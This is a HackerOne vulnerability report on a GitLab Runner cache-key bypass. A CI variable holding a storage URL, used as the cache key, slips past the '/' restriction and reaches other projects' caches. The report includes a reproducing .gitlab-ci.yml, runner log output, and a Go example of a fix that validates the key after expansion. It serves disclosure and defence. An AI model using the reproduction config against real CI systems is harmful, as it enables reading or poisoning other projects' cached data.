gitlab runner: cache key bypass / cache poisoning / cache retrieval
HackerOne report #565419 by wiardvanrij
on 2019-05-03, assigned to asaba
Summary
By bypassing the limits on the cache key, it is possible to store & retrieve other project cache files.
"The cache:key variable cannot contain the / character, or the equivalent URI-encoded %2F; a value made only of dots (., %2E) is also forbidden."
Yet we can override this by setting an env variable, which does get parsed.
Steps to reproduce
Create a .gitlab-ci.yml
Set an env variable like:
```yaml
variables:
  FOO: "https://storage.googleapis.com/gitlab-com-runners-cache/project/1/foo"
```
and use the cache key like:
```yaml
cache:
  key: "$FOO"
```
Full gitlab-ci:
```yaml
stages:
  - build

before_script:
  - echo "Hello"

job A:
  variables:
    FOO: "https://storage.googleapis.com/gitlab-com-runners-cache/project/1/foo"
  stage: build
  script:
    - echo "lets go"
  cache:
    key: "$FOO"
    paths:
      - whatever/
  after_script:
    - echo "done"
```
Impact
```
Checking cache for https://storage.googleapis.com/gitlab-com-runners-cache/project/1/foo...
```
I have not done excessive testing but it does look like it will access other project cache files. The same goes for setting cache.
Examples
```
Running with gitlab-runner 11.10.1 (1f513601)
  on docker-auto-scale 72989761
Using Docker executor with image ruby:2.5 ...
Pulling docker image ruby:2.5 ...
Using docker image sha256:e86557c9a8ab97ec7e9ba705f3e3411428b50d19d38643a0f52cb49faf735d3d for ruby:2.5 ...
Running on runner-72989761-project-10726061-concurrent-0 via runner-72989761-srm-1556917093-813141f1...
Initialized empty Git repository in /builds/wiardvanrij/testing/.git/
Fetching changes...
Created fresh repository.
From https://gitlab.com/wiardvanrij/testing
 * [new branch]      master     -> origin/master
Checking out d2575cb2 as master...
Skipping Git submodules setup
Checking cache for https://storage.googleapis.com/gitlab-com-runners-cache/project/1/foo...
FATAL: file does not exist
```
What is the current bug behavior?
What is the expected correct behavior?
The cache:key variable cannot contain the / character, or the equivalent URI-encoded %2F; a value made only of dots (., %2E) is also forbidden.
Relevant logs and/or screenshots
Output of checks
This bug happens on GitLab.com
Results of GitLab environment info
n/a
Impact
It would be possible to retrieve cache data from other projects. Vice versa, it would be possible to "poison" other projects' cache data.
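The report's core point is an ordering bug: the cache:key restriction is checked on the literal YAML value, but the value actually used to address the cache is the one after variable expansion. The following is an added example written for this report, not GitLab Runner's own code; it models expansion with Go's os.Expand and shows the quoted rule passing on the raw "$FOO" but rejecting the expanded key.

```go
package main

import (
	"fmt"
	"os"
	"strings"
)

// Constructed example, not GitLab Runner's code; expansion modelled with os.Expand.

// expandKey resolves $VAR / ${VAR} references in a cache:key using the job's variables.
func expandKey(key string, vars map[string]string) string {
	return os.Expand(key, func(name string) string { return vars[name] })
}

// validateCacheKey applies the rule quoted in the report: no "/", no URI-encoded
// "%2F", and not a value made only of dots ("." or "%2E").
func validateCacheKey(key string) error {
	lower := strings.ToLower(key)
	if strings.Contains(key, "/") || strings.Contains(lower, "%2f") {
		return fmt.Errorf("cache key %q contains a path separator", key)
	}
	// Remove every "%2E" and "."; a key made only of dots (or empty) becomes "".
	if strings.Trim(strings.ReplaceAll(lower, "%2e", ""), ".") == "" {
		return fmt.Errorf("cache key %q is empty or made only of dots", key)
	}
	return nil
}

// resolveCacheKey is the hardened order of operations: expand first, then
// validate the value that will actually address the cache.
func resolveCacheKey(rawKey string, vars map[string]string) (string, error) {
	expanded := expandKey(rawKey, vars)
	if err := validateCacheKey(expanded); err != nil {
		return "", err
	}
	return expanded, nil
}

func main() {
	vars := map[string]string{
		"FOO": "https://storage.googleapis.com/gitlab-com-runners-cache/project/1/foo",
	}
	// Checking the raw "$FOO" passes (no "/" yet): this is the reported bypass.
	fmt.Println("raw key check:", validateCacheKey("$FOO"))
	// Expanding before validating rejects the same job definition.
	_, err := resolveCacheKey("$FOO", vars)
	fmt.Println("expanded key check:", err)
}
```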